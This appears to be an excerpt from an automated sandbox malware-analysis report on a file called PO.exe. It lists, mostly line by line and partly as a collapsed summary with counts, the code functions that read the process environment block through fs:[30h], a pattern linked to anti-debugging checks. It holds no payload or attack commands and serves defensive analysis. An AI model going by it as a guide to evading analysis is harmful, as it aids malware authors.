                Source: C:\Users\user\Desktop\PO.exe, Code function: 2_2_0179E10E mov eax, dword ptr fs:[00000030h] 2_2_0179E10E
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_0179E10E mov eax, dword ptr fs:[00000030h]2_2_0179E10E
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_0179E10E mov ecx, dword ptr fs:[00000030h]2_2_0179E10E
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_0179E10E mov eax, dword ptr fs:[00000030h]2_2_0179E10E
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_0179E10E mov ecx, dword ptr fs:[00000030h]2_2_0179E10E
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_017201F8 mov eax, dword ptr fs:[00000030h]2_2_017201F8
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_017C61E5 mov eax, dword ptr fs:[00000030h]2_2_017C61E5
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_0176E1D0 mov eax, dword ptr fs:[00000030h]2_2_0176E1D0
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_0176E1D0 mov eax, dword ptr fs:[00000030h]2_2_0176E1D0
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_0176E1D0 mov ecx, dword ptr fs:[00000030h]2_2_0176E1D0
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_0176E1D0 mov eax, dword ptr fs:[00000030h]2_2_0176E1D0
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_0176E1D0 mov eax, dword ptr fs:[00000030h]2_2_0176E1D0
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_017B61C3 mov eax, dword ptr fs:[00000030h]2_2_017B61C3
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_017B61C3 mov eax, dword ptr fs:[00000030h]2_2_017B61C3
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_0177019F mov eax, dword ptr fs:[00000030h]2_2_0177019F
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_0177019F mov eax, dword ptr fs:[00000030h]2_2_0177019F
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_0177019F mov eax, dword ptr fs:[00000030h]2_2_0177019F
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_0177019F mov eax, dword ptr fs:[00000030h]2_2_0177019F
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_017AC188 mov eax, dword ptr fs:[00000030h]2_2_017AC188
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_017AC188 mov eax, dword ptr fs:[00000030h]2_2_017AC188
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_01730185 mov eax, dword ptr fs:[00000030h]2_2_01730185
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_016EA197 mov eax, dword ptr fs:[00000030h]2_2_016EA197
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_016EA197 mov eax, dword ptr fs:[00000030h]2_2_016EA197
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_016EA197 mov eax, dword ptr fs:[00000030h]2_2_016EA197
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_01794180 mov eax, dword ptr fs:[00000030h]2_2_01794180
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_01794180 mov eax, dword ptr fs:[00000030h]2_2_01794180
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_0171C073 mov eax, dword ptr fs:[00000030h]2_2_0171C073
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_01776050 mov eax, dword ptr fs:[00000030h]2_2_01776050
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_016F2050 mov eax, dword ptr fs:[00000030h]2_2_016F2050
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_01786030 mov eax, dword ptr fs:[00000030h]2_2_01786030
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_016EA020 mov eax, dword ptr fs:[00000030h]2_2_016EA020
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_016EC020 mov eax, dword ptr fs:[00000030h]2_2_016EC020
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_0170E016 mov eax, dword ptr fs:[00000030h]2_2_0170E016
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_0170E016 mov eax, dword ptr fs:[00000030h]2_2_0170E016
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_0170E016 mov eax, dword ptr fs:[00000030h]2_2_0170E016
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_0170E016 mov eax, dword ptr fs:[00000030h]2_2_0170E016
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_01774000 mov ecx, dword ptr fs:[00000030h]2_2_01774000
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_01792000 mov eax, dword ptr fs:[00000030h]2_2_01792000
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_01792000 mov eax, dword ptr fs:[00000030h]2_2_01792000
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_01792000 mov eax, dword ptr fs:[00000030h]2_2_01792000
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_01792000 mov eax, dword ptr fs:[00000030h]2_2_01792000
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_01792000 mov eax, dword ptr fs:[00000030h]2_2_01792000
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_01792000 mov eax, dword ptr fs:[00000030h]2_2_01792000
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_01792000 mov eax, dword ptr fs:[00000030h]2_2_01792000
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_01792000 mov eax, dword ptr fs:[00000030h]2_2_01792000
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_017320F0 mov ecx, dword ptr fs:[00000030h]2_2_017320F0
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_016F80E9 mov eax, dword ptr fs:[00000030h]2_2_016F80E9
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_016EA0E3 mov ecx, dword ptr fs:[00000030h]2_2_016EA0E3
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_017760E0 mov eax, dword ptr fs:[00000030h]2_2_017760E0
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_016EC0F0 mov eax, dword ptr fs:[00000030h]2_2_016EC0F0
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_017720DE mov eax, dword ptr fs:[00000030h]2_2_017720DE
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_017B60B8 mov eax, dword ptr fs:[00000030h]2_2_017B60B8
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_017B60B8 mov ecx, dword ptr fs:[00000030h]2_2_017B60B8
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_017880A8 mov eax, dword ptr fs:[00000030h]2_2_017880A8
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_016F208A mov eax, dword ptr fs:[00000030h]2_2_016F208A
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_0179437C mov eax, dword ptr fs:[00000030h]2_2_0179437C
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_017BA352 mov eax, dword ptr fs:[00000030h]2_2_017BA352
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_01798350 mov ecx, dword ptr fs:[00000030h]2_2_01798350
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_0177035C mov eax, dword ptr fs:[00000030h]2_2_0177035C
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_0177035C mov eax, dword ptr fs:[00000030h]2_2_0177035C
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_0177035C mov eax, dword ptr fs:[00000030h]2_2_0177035C
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_0177035C mov ecx, dword ptr fs:[00000030h]2_2_0177035C
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_0177035C mov eax, dword ptr fs:[00000030h]2_2_0177035C
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_0177035C mov eax, dword ptr fs:[00000030h]2_2_0177035C
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_01772349 mov eax, dword ptr fs:[00000030h]2_2_01772349
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_01772349 mov eax, dword ptr fs:[00000030h]2_2_01772349
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_01772349 mov eax, dword ptr fs:[00000030h]2_2_01772349
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_01772349 mov eax, dword ptr fs:[00000030h]2_2_01772349
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_01772349 mov eax, dword ptr fs:[00000030h]2_2_01772349
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_01772349 mov eax, dword ptr fs:[00000030h]2_2_01772349
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_01772349 mov eax, dword ptr fs:[00000030h]2_2_01772349
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_01772349 mov eax, dword ptr fs:[00000030h]2_2_01772349
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_01772349 mov eax, dword ptr fs:[00000030h]2_2_01772349
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_01772349 mov eax, dword ptr fs:[00000030h]2_2_01772349
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_01772349 mov eax, dword ptr fs:[00000030h]2_2_01772349
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_01772349 mov eax, dword ptr fs:[00000030h]2_2_01772349
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_01772349 mov eax, dword ptr fs:[00000030h]2_2_01772349
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_01772349 mov eax, dword ptr fs:[00000030h]2_2_01772349
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_01772349 mov eax, dword ptr fs:[00000030h]2_2_01772349
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_01710310 mov ecx, dword ptr fs:[00000030h]2_2_01710310
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_0172A30B mov eax, dword ptr fs:[00000030h]2_2_0172A30B
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_0172A30B mov eax, dword ptr fs:[00000030h]2_2_0172A30B
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_0172A30B mov eax, dword ptr fs:[00000030h]2_2_0172A30B
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_016EC310 mov ecx, dword ptr fs:[00000030h]2_2_016EC310
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_0170E3F0 mov eax, dword ptr fs:[00000030h]2_2_0170E3F0
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_0170E3F0 mov eax, dword ptr fs:[00000030h]2_2_0170E3F0
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_0170E3F0 mov eax, dword ptr fs:[00000030h]2_2_0170E3F0
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_017263FF mov eax, dword ptr fs:[00000030h]2_2_017263FF
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_017003E9 mov eax, dword ptr fs:[00000030h]2_2_017003E9
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_017003E9 mov eax, dword ptr fs:[00000030h]2_2_017003E9
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_017003E9 mov eax, dword ptr fs:[00000030h]2_2_017003E9
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_017003E9 mov eax, dword ptr fs:[00000030h]2_2_017003E9
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_017003E9 mov eax, dword ptr fs:[00000030h]2_2_017003E9
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_017003E9 mov eax, dword ptr fs:[00000030h]2_2_017003E9
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_017003E9 mov eax, dword ptr fs:[00000030h]2_2_017003E9
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_017003E9 mov eax, dword ptr fs:[00000030h]2_2_017003E9
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_0179E3DB mov eax, dword ptr fs:[00000030h]2_2_0179E3DB
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_0179E3DB mov eax, dword ptr fs:[00000030h]2_2_0179E3DB
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_0179E3DB mov ecx, dword ptr fs:[00000030h]2_2_0179E3DB
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_0179E3DB mov eax, dword ptr fs:[00000030h]2_2_0179E3DB
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_017943D4 mov eax, dword ptr fs:[00000030h]2_2_017943D4
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_017943D4 mov eax, dword ptr fs:[00000030h]2_2_017943D4
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_016FA3C0 mov eax, dword ptr fs:[00000030h]2_2_016FA3C0
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_016FA3C0 mov eax, dword ptr fs:[00000030h]2_2_016FA3C0
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_016FA3C0 mov eax, dword ptr fs:[00000030h]2_2_016FA3C0
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_016FA3C0 mov eax, dword ptr fs:[00000030h]2_2_016FA3C0
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_016FA3C0 mov eax, dword ptr fs:[00000030h]2_2_016FA3C0
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_016FA3C0 mov eax, dword ptr fs:[00000030h]2_2_016FA3C0
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_016F83C0 mov eax, dword ptr fs:[00000030h]2_2_016F83C0
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_016F83C0 mov eax, dword ptr fs:[00000030h]2_2_016F83C0
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_016F83C0 mov eax, dword ptr fs:[00000030h]2_2_016F83C0
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_016F83C0 mov eax, dword ptr fs:[00000030h]2_2_016F83C0
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_017AC3CD mov eax, dword ptr fs:[00000030h]2_2_017AC3CD
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_017763C0 mov eax, dword ptr fs:[00000030h]2_2_017763C0
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_016EE388 mov eax, dword ptr fs:[00000030h]2_2_016EE388
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_016EE388 mov eax, dword ptr fs:[00000030h]2_2_016EE388
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_016EE388 mov eax, dword ptr fs:[00000030h]2_2_016EE388
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_016E8397 mov eax, dword ptr fs:[00000030h]2_2_016E8397
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_016E8397 mov eax, dword ptr fs:[00000030h]2_2_016E8397
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_016E8397 mov eax, dword ptr fs:[00000030h]2_2_016E8397
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_0171438F mov eax, dword ptr fs:[00000030h]2_2_0171438F
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_0171438F mov eax, dword ptr fs:[00000030h]2_2_0171438F
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_016E826B mov eax, dword ptr fs:[00000030h]2_2_016E826B
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_017A0274 mov eax, dword ptr fs:[00000030h]2_2_017A0274
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_017A0274 mov eax, dword ptr fs:[00000030h]2_2_017A0274
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_017A0274 mov eax, dword ptr fs:[00000030h]2_2_017A0274
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_017A0274 mov eax, dword ptr fs:[00000030h]2_2_017A0274
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_017A0274 mov eax, dword ptr fs:[00000030h]2_2_017A0274
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_017A0274 mov eax, dword ptr fs:[00000030h]2_2_017A0274
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_017A0274 mov eax, dword ptr fs:[00000030h]2_2_017A0274
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_017A0274 mov eax, dword ptr fs:[00000030h]2_2_017A0274
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_017A0274 mov eax, dword ptr fs:[00000030h]2_2_017A0274
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_017A0274 mov eax, dword ptr fs:[00000030h]2_2_017A0274
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_017A0274 mov eax, dword ptr fs:[00000030h]2_2_017A0274
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_017A0274 mov eax, dword ptr fs:[00000030h]2_2_017A0274
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_016F4260 mov eax, dword ptr fs:[00000030h]2_2_016F4260
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_016F4260 mov eax, dword ptr fs:[00000030h]2_2_016F4260
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_016F4260 mov eax, dword ptr fs:[00000030h]2_2_016F4260
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_017AA250 mov eax, dword ptr fs:[00000030h]2_2_017AA250
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_017AA250 mov eax, dword ptr fs:[00000030h]2_2_017AA250
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_01778243 mov eax, dword ptr fs:[00000030h]2_2_01778243
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_01778243 mov ecx, dword ptr fs:[00000030h]2_2_01778243
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_016F6259 mov eax, dword ptr fs:[00000030h]2_2_016F6259
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_016EA250 mov eax, dword ptr fs:[00000030h]2_2_016EA250
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_016E823B mov eax, dword ptr fs:[00000030h]2_2_016E823B
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_017002E1 mov eax, dword ptr fs:[00000030h]2_2_017002E1
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_017002E1 mov eax, dword ptr fs:[00000030h]2_2_017002E1
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_017002E1 mov eax, dword ptr fs:[00000030h]2_2_017002E1
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_016FA2C3 mov eax, dword ptr fs:[00000030h]2_2_016FA2C3
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_016FA2C3 mov eax, dword ptr fs:[00000030h]2_2_016FA2C3
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_016FA2C3 mov eax, dword ptr fs:[00000030h]2_2_016FA2C3
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_016FA2C3 mov eax, dword ptr fs:[00000030h]2_2_016FA2C3
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_016FA2C3 mov eax, dword ptr fs:[00000030h]2_2_016FA2C3
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_017002A0 mov eax, dword ptr fs:[00000030h]2_2_017002A0
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_017002A0 mov eax, dword ptr fs:[00000030h]2_2_017002A0
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_017862A0 mov eax, dword ptr fs:[00000030h]2_2_017862A0
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_017862A0 mov ecx, dword ptr fs:[00000030h]2_2_017862A0
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_017862A0 mov eax, dword ptr fs:[00000030h]2_2_017862A0
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_017862A0 mov eax, dword ptr fs:[00000030h]2_2_017862A0
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_017862A0 mov eax, dword ptr fs:[00000030h]2_2_017862A0
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_017862A0 mov eax, dword ptr fs:[00000030h]2_2_017862A0
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_01770283 mov eax, dword ptr fs:[00000030h]2_2_01770283
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_01770283 mov eax, dword ptr fs:[00000030h]2_2_01770283
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_01770283 mov eax, dword ptr fs:[00000030h]2_2_01770283
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_0172E284 mov eax, dword ptr fs:[00000030h]2_2_0172E284
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_0172E284 mov eax, dword ptr fs:[00000030h]2_2_0172E284
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_0172656A mov eax, dword ptr fs:[00000030h]2_2_0172656A
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_0172656A mov eax, dword ptr fs:[00000030h]2_2_0172656A
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_0172656A mov eax, dword ptr fs:[00000030h]2_2_0172656A
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_016F8550 mov eax, dword ptr fs:[00000030h]2_2_016F8550
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_016F8550 mov eax, dword ptr fs:[00000030h]2_2_016F8550
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_01700535 mov eax, dword ptr fs:[00000030h]2_2_01700535
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_01700535 mov eax, dword ptr fs:[00000030h]2_2_01700535
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_01700535 mov eax, dword ptr fs:[00000030h]2_2_01700535
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_01700535 mov eax, dword ptr fs:[00000030h]2_2_01700535
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_01700535 mov eax, dword ptr fs:[00000030h]2_2_01700535
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_01700535 mov eax, dword ptr fs:[00000030h]2_2_01700535
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_0171E53E mov eax, dword ptr fs:[00000030h]2_2_0171E53E
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_0171E53E mov eax, dword ptr fs:[00000030h]2_2_0171E53E
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_0171E53E mov eax, dword ptr fs:[00000030h]2_2_0171E53E
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_0171E53E mov eax, dword ptr fs:[00000030h]2_2_0171E53E
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_0171E53E mov eax, dword ptr fs:[00000030h]2_2_0171E53E
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_01786500 mov eax, dword ptr fs:[00000030h]2_2_01786500
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_017C4500 mov eax, dword ptr fs:[00000030h]2_2_017C4500
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_017C4500 mov eax, dword ptr fs:[00000030h]2_2_017C4500
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_017C4500 mov eax, dword ptr fs:[00000030h]2_2_017C4500
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_017C4500 mov eax, dword ptr fs:[00000030h]2_2_017C4500
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_017C4500 mov eax, dword ptr fs:[00000030h]2_2_017C4500
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_017C4500 mov eax, dword ptr fs:[00000030h]2_2_017C4500
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_017C4500 mov eax, dword ptr fs:[00000030h]2_2_017C4500
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_016F25E0 mov eax, dword ptr fs:[00000030h]2_2_016F25E0
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_0171E5E7 mov eax, dword ptr fs:[00000030h]2_2_0171E5E7
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_0171E5E7 mov eax, dword ptr fs:[00000030h]2_2_0171E5E7
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_0171E5E7 mov eax, dword ptr fs:[00000030h]2_2_0171E5E7
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_0171E5E7 mov eax, dword ptr fs:[00000030h]2_2_0171E5E7
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_0171E5E7 mov eax, dword ptr fs:[00000030h]2_2_0171E5E7
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_0171E5E7 mov eax, dword ptr fs:[00000030h]2_2_0171E5E7
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_0171E5E7 mov eax, dword ptr fs:[00000030h]2_2_0171E5E7
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_0171E5E7 mov eax, dword ptr fs:[00000030h]2_2_0171E5E7
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_0172C5ED mov eax, dword ptr fs:[00000030h]2_2_0172C5ED
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_0172C5ED mov eax, dword ptr fs:[00000030h]2_2_0172C5ED
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_0172A5D0 mov eax, dword ptr fs:[00000030h]2_2_0172A5D0
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_0172A5D0 mov eax, dword ptr fs:[00000030h]2_2_0172A5D0
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_0172E5CF mov eax, dword ptr fs:[00000030h]2_2_0172E5CF
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_0172E5CF mov eax, dword ptr fs:[00000030h]2_2_0172E5CF
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_016F65D0 mov eax, dword ptr fs:[00000030h]2_2_016F65D0
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_017145B1 mov eax, dword ptr fs:[00000030h]2_2_017145B1
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_017145B1 mov eax, dword ptr fs:[00000030h]2_2_017145B1
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_017705A7 mov eax, dword ptr fs:[00000030h]2_2_017705A7
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_017705A7 mov eax, dword ptr fs:[00000030h]2_2_017705A7
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_017705A7 mov eax, dword ptr fs:[00000030h]2_2_017705A7
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_016F2582 mov eax, dword ptr fs:[00000030h]2_2_016F2582
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_016F2582 mov ecx, dword ptr fs:[00000030h]2_2_016F2582
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_0172E59C mov eax, dword ptr fs:[00000030h]2_2_0172E59C
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_01724588 mov eax, dword ptr fs:[00000030h]2_2_01724588
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_0171A470 mov eax, dword ptr fs:[00000030h]2_2_0171A470
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_0171A470 mov eax, dword ptr fs:[00000030h]2_2_0171A470
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_0171A470 mov eax, dword ptr fs:[00000030h]2_2_0171A470
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_0177C460 mov ecx, dword ptr fs:[00000030h]2_2_0177C460
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_0171245A mov eax, dword ptr fs:[00000030h]2_2_0171245A
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_017AA456 mov eax, dword ptr fs:[00000030h]2_2_017AA456
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_0172E443 mov eax, dword ptr fs:[00000030h]2_2_0172E443
                Source: C:\Users\user\Desktop\PO.exeCode function: 2_2_0172E443 mov eax, dword ptr fs:[00000030h]2_2_0172E443
                Source: C:\Users\user\Desktop\PO.exe  Code functions that read the PEB pointer from the TEB (fs:[00000030h] on 32-bit Windows). The report lists one entry per read; they are collapsed here to one line per function and register, with the number of reads in parentheses:
                2_2_0172E443 mov eax, dword ptr fs:[00000030h] (6)
                2_2_016E645D mov eax, dword ptr fs:[00000030h] (1)
                2_2_016EC427 mov eax, dword ptr fs:[00000030h] (1)
                2_2_016EE420 mov eax, dword ptr fs:[00000030h] (3)
                2_2_01776420 mov eax, dword ptr fs:[00000030h] (7)
                2_2_01728402 mov eax, dword ptr fs:[00000030h] (3)
                2_2_016F04E5 mov ecx, dword ptr fs:[00000030h] (1)
                2_2_017244B0 mov ecx, dword ptr fs:[00000030h] (1)
                2_2_016F64AB mov eax, dword ptr fs:[00000030h] (1)
                2_2_0177A4B0 mov eax, dword ptr fs:[00000030h] (1)
                2_2_017AA49A mov eax, dword ptr fs:[00000030h] (1)
                2_2_01700770 mov eax, dword ptr fs:[00000030h] (12)
                2_2_016F8770 mov eax, dword ptr fs:[00000030h] (1)
                2_2_01774755 mov eax, dword ptr fs:[00000030h] (1)
                2_2_01732750 mov eax, dword ptr fs:[00000030h] (2)
                2_2_0177E75D mov eax, dword ptr fs:[00000030h] (1)
